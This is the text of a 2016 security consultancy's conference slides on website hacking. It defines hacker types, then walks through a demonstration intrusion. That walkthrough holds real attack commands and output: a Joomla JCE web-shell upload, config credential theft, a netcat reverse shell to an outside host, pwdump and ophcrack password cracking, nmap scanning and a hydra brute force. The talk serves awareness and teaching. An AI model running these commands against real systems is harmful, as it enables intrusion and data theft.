Securious talk at the SWCSC event on 24th Feb 2016.

www.securious.co.uk

Pete WoodwardPCI QSA|CISSP|MBCS|CEH

A look into Hacking Websites

www.securious.co.uk

• What is a Hacker?

• Who Hacks?

• Why should we care?

• An Ethical Hack

Agenda

www.securious.co.uk

What is a Hacker?

In the computer security context, a hacker is

someone who seeks and exploits weaknesses

in a computer system or computer network.

www.securious.co.uk

www.securious.co.uk

White Hat

Black Hat

Grey Hat

Fall into 3 categories

Breaks security for non-malicious reasons.

‘Ethical Hacker’

Violates computer security for little reason beyond

maliciousness or personal gain.

‘Criminal’

Lies between a black hat and a white hat, may hack systems

for the sole purpose of notifying the Administrator that their

system has a security defect.

www.securious.co.uk

Why should we care?

www.securious.co.uk

Why should we care?

www.securious.co.uk

Why should we care?

• Name

• Address

• Date of Birth

• Email Address

• Telephone number

• TalkTalk account information

• Credit Card details and/or bank

account details

www.securious.co.uk

Why should we care?

www.securious.co.uk

Why should we care?

www.securious.co.uk

An Ethical Hack

www.securious.co.uk

An Ethical Hack

Generally, the method behind most data breaches isn’t

glamorous, and most involves basic stuff, like bad

passwords, insecure remote access, un-patched systems,

default credentials, or a simple breakdown in the human

data control chain.

www.securious.co.uk

Starts with Footprinting and Reconnaissance

• Finding Company’s Public and Restricted Websites

• Determining the Operating System

• Collect Location Information

• People Search: Social Networking Services

www.securious.co.uk

We then conduct Scanning

• Check for LIVE systems (ICMP Scanning)

• Ping Sweeping on a range of IP addresses

• Attempt to obtain a response (ICMP Echo-Reply) that

will indicate if a system is LIVE

• Fping is a useful automated tool and helps speeds up

the scanning process

www.securious.co.uk

Next is Enumeration

• First REAL attack on target network

• Involves active connections to a system and directed

queries

• Attempt to identify network resources and shares

• Find Users, Groups, applications and passwords in

use

www.securious.co.uk

The Hack

Identified a target Website – happens to be running Joomla!

Copyright Dr Paul Dowland,

Secure South West 6

Generated using https://www.shodan.io/

www.securious.co.uk

The Hack

Target specific vulnerability within Joomla! …and deploy a

simple script…


Secure South West 6

root@kali:~# perl jce.pl target.domain.org

.::. Exploit for JCE Joomla Extension (Auto Shell

Uploader) V0.1 .::.

|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)

||||

[*] Checking Exploitability ...

[*] Trying to upload 0day.gif ...

[*] Trying to change extension from .gif to .php ...

[+] 0day.php was successfully uploaded

[+] Path:

target.domain.org/images/stories/0day.php?cmd=id

www.securious.co.uk

The Hack

We can examine the file system…find blog config and get

MySQL credentials…


Secure South West 6

/* Database Settings */

var $host = 'localhost';

var $user = 'root';

var $password = 'root';

var $db = 'blog';

var $dbprefix = 'jos _';

www.securious.co.uk

The Hack

Get the blog admin password…Joomla! Uses a simple

hashing mechanism…

md5(Password+salt)

stored as hash:salt


Secure South West 6

fdb3d81d39d925c1332559d2ea53823e:

Ckbco8niuZ6ZR9lSnB80I8NtJki325j2

Write a simple script with a password list to

crack the hash….

www.securious.co.uk

The Hack

Launch a Remote Shell…’netcat’ for example


Secure South West 6

www.securious.co.uk

The Hack

Escalate privileges…


Secure South West 6

@echo Dumping blog

@"C:\Program Files (x86)\MySQL\MySQL Server

5.5\bin\mysqldump.exe" --user=%dbuser% --

password=%dbpass% --databases blog --log-

error="C:\Backup\dumperrors.txt" >

"C:\Backup\blog.%backupdate%.sql"

START c:\inetpub\wwwroot\images\stories\nc

x.x.x.y 80 -e cmd.exe

www.securious.co.uk

The Hack

Get Windows Passwords…


Secure South West 6

>pwdump7

Administrator:500:NO

PASSWORD*********************:47443E24FE435EB5210D91EF28

38659D:::

Guest:501:NO PASSWORD*********************:NO

PASSWORD*********************:::

hackme:1004:NO

PASSWORD*********************:F1B94635FACC09D9FCC637A113

DC10B1:::

hackme2:1005:NO

PASSWORD*********************:079F890A968B7F710A373ABB79

EB11EB:::

Pwdump v7.1 - raw password extractor

Author: Andres Tarasco Acuna

www.securious.co.uk

The Hack

Crack the Password… (ophcrack)


Secure South West 6

www.securious.co.uk

The Hack

Cracked…in around 15 minutes, using FREE tool..!


Secure South West 6

Via: http://ophcrack.sourceforge.net/

079F890A968B7F710A373ABB79EB11EB

Wizard1!

www.securious.co.uk

The Hack

Scan INTERNAL network…


Secure South West 6

>nmap -sn 192.168.1.0/24

Starting Nmap 7.01 ( https://nmap.org )

MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate)

Nmap scan report for 192.168.1.50

Host is up (0.00s latency).

MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc)



MAC Address: 00:24:B2:BA:6C:90 (Netgear)



MAC Address: 00:24:B2:BA:66:B4 (Netgear)



www.securious.co.uk

The Hack

Scan INTERESTING host…


Secure South West 6

>nmap 192.168.1.200

Starting Nmap 7.01 ( https://nmap.org )



Not shown: 1084 closed ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open sunrpc

139/tcp open netbios-ssn

199/tcp open unknown

443/tcp open https

445/tcp open microsoft-ds

548/tcp open afpovertcp

www.securious.co.uk

The Hack

Enumerate the shares…


Secure South West 6

>net view \\192.168.1.200

Shared resources at \\192.168.1.200

TEST-NAS_SECRET_Storage_01

Share name Type Used as Comment

----------------------------------------

Applications Disk Applications share

DiskImages Disk Imaging Share

Media Disk Media Share

Projects Disk Projects share

Scratch Disk Scratch space

The command completed successfully.

www.securious.co.uk

The Hack

Access the Network Storage Device…(Password cracking tool)


Secure South West 6

>hydra -l hackme -P top500.txt -s 443 192.168.1.200

https-get /shares/

Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not

use in military or secret service organizations, or

for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-

02-07 23:16:06

[DATA] max 16 tasks per 1 server, overall 64 tasks,

500 login tries (l:1/p:500),

~0 tries per task

[DATA] attacking service http-get on port 443 with SSL

[443][http-get] host: 192.168.1.200 login: Admin

password: letmeIN

www.securious.co.uk

The Hack

Enjoy….


Secure South West 6

>net use z: \\192.168.1.200\diskimages

letmeIN /USER:Admin

The command completed successfully.

>dir z:

Volume in drive Z is DiskImages

Volume Serial Number is 3A5C-C2B8

Directory of Z:\

10/01/2016 15:00 <DIR> .

11/05/2015 22:01 <DIR> ..

04/11/2014 15:48 <DIR> Test Stuff

22/07/2015 22:02 <DIR> SECRET STUFF

17/10/2014 15:48 <DIR> Old Stuff

...

www.securious.co.uk

Any Questions?

Securious talk at the SWCSC event on 24th Feb 2016.

Technology